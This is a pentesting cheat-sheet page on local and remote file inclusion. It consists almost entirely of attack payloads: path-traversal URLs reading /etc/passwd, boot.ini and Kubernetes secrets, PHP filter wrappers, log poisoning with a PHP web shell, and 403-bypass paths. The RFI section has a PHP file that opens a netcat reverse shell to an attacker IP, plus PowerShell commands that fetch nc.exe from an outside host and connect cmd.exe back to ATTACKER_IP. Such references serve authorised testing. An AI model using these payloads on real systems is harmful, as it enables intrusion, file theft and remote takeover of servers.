Pentest Book
Search…
LFI/RFI

Tools

1
# https://github.com/kurobeats/fimap
2
fimap -u "http://10.11.1.111/example.php?test="
3
# https://github.com/P0cL4bs/Kadimus
4
./kadimus -u localhost/?pg=contact -A my_user_agent
5
# https://github.com/wireghoul/dotdotpwn
6
dotdotpwn.pl -m http -h 10.11.1.111 -M GET -o unix
Copied!
How to
    1.
    Look requests with filename like include=main.inc template=/en/sidebar file=foo/file1.txt
    2.
    Modify and test: file=foo/bar/../file1.txt
      1.
      If the response is the same could be vulnerable
      2.
      If not there is some kind of block or sanitizer
    3.
    Try to access world-readable files like /etc/passwd /win.ini

LFI

1
# Basic LFI
2
curl -s http://10.11.1.111/gallery.php?page=/etc/passwd
3
4
# If LFI, also check
5
/var/run/secrets/kubernetes.io/serviceaccount
6
7
# PHP Filter b64
8
http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php
9
http://10.11.1.111/index.php?m=php://filter/convert.base64-encode/resource=config
10
http://10.11.1.111/maliciousfile.txt%00?page=php://filter/convert.base64-encode/resource=../config.php
11
# Nullbyte ending
12
http://10.11.1.111/page=http://10.11.1.111/maliciousfile%00.txt
13
http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00
14
# Other techniques
15
https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c
16
https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
17
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd
18
https://abc.redact.com/static/../../../../../../../../../../../../../../../etc/passwd
19
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00
20
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.html
21
https://abc.redact.com/asd.php?file:///etc/passwd
22
https://abc.redact.com/asd.php?file:///etc/passwd%00
23
https://abc.redact.com/asd.php?file:///etc/passwd%00.html
24
https://abc.redact.com/asd.php?file:///etc/passwd%00.ext
25
https://abc.redact.com/asd.php?file:///..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.ext/etc/passwd
26
https://target.com/admin..;/
27
https://target.com/../admin
28
https://target.com/whatever/..;/admin
29
https://target.com/whatever.php~
30
# Cookie based
31
GET /vulnerable.php HTTP/1.1
32
Cookie:usid=../../../../../../../../../../../../../etc/pasdwd
33
# LFI Windows
34
http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00
35
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini
36
http://10.11.1.111/addguestbook.php?LANG=../../../../../../../../../../../../../../../boot.ini
37
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00
38
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00.html
39
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini
40
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00
41
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00.html
42
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini
43
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00
44
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00.html
45
http://10.11.1.111/addguestbook.php?LANG=file:///C:/boot.ini
46
http://10.11.1.111/addguestbook.php?LANG=file:///C:/win.ini
47
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00.ext
48
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00.ext
49
50
# LFI using video upload:
51
https://github.com/FFmpeg/FFmpeg
52
https://hackerone.com/reports/226756
53
https://hackerone.com/reports/237381
54
https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit
55
https://github.com/neex/ffmpeg-avi-m3u-xbin
56
57
# Contaminating log files
58
[email protected]:~# nc -v 10.11.1.111 80
59
10.11.1.111: inverse host lookup failed: Unknown host
60
(UNKNOWN) [10.11.1.111] 80 (http) open
61
<?php echo shell_exec($_GET['cmd']);?>
62
http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig
63
64
# Common LFI to RCE:
65
Using file upload forms/functions
66
Using the PHP wrapper expect://command
67
Using the PHP wrapper php://file
68
Using the PHP wrapper php://filter
69
Using PHP input:// stream
70
Using data://text/plain;base64,command
71
Using /proc/self/environ
72
Using /proc/self/fd
73
Using log files with controllable input like:
74
/var/log/apache/access.log
75
/var/log/apache/error.log
76
/var/log/vsftpd.log
77
/var/log/sshd.log
78
/var/log/mail
79
80
# LFI possibilities by filetype
81
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
82
SVG: Stored XSS / SSRF / XXE
83
GIF: Stored XSS / SSRF
84
CSV: CSV injection
85
XML: XXE
86
AVI: LFI / SSRF
87
HTML / JS : HTML injection / XSS / Open redirect
88
PNG / JPEG: Pixel flood attack (DoS)
89
ZIP: RCE via LFI / DoS
90
PDF / PPTX: SSRF / BLIND XXE
91
92
# Chaining with other vulns
93
../../../tmp/lol.png —> for path traversal
94
sleep(10)-- -.jpg —> for SQL injection
95
<svg onload=alert(document.domain)>.jpg/png —> for XSS
96
; sleep 10;> for command injections
97
98
# 403 bypasses
99
/accessible/..;/admin
100
/.;/admin
101
/admin;/
102
/admin/~
103
/./admin/./
104
/admin?param
105
/%2e/admin
106
/admin#
107
/secret/
108
/secret/.
109
//secret//
110
/./secret/..
111
/admin..;/
112
/admin%20/
113
/%20admin%20/
114
/admin%20/page
115
/%61dmin
116
117
# Path Bypasses
118
# 16-bit Unicode encoding
119
# double URL encoding
120
# overlong UTF-8 Unicode encoding
121
….//
122
….\/
123
…./\
124
….\\
Copied!

RFI

1
# RFI:
2
http://10.11.1.111/addguestbook.php?LANG=http://10.11.1.111:31/evil.txt%00
3
Content of evil.txt:
4
<?php echo shell_exec("nc.exe 10.11.0.105 4444 -e cmd.exe") ?>
5
# RFI over SMB (Windows)
6
cat php_cmd.php
7
<?php echo shell_exec($_GET['cmd']);?>
8
# Start SMB Server in attacker machine and put evil script
9
# Access it via browser (2 request attack):
10
# http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c Invoke-WebRequest -Uri "http://10.10.14.42/nc.exe" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe"
11
# http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe" -e cmd.exe ATTACKER_IP 1234
12
13
# Cross Content Hijacking:
14
https://github.com/nccgroup/CrossSiteContentHijacking
15
https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/
16
http://50.56.33.56/blog/?p=242
17
18
# Encoding scripts in PNG IDAT chunk:
19
https://yqh.at/scripts_in_pngs.php
20
Copied!
Last modified 7mo ago
Export as PDF
Copy link
Contents
Tools
LFI
RFI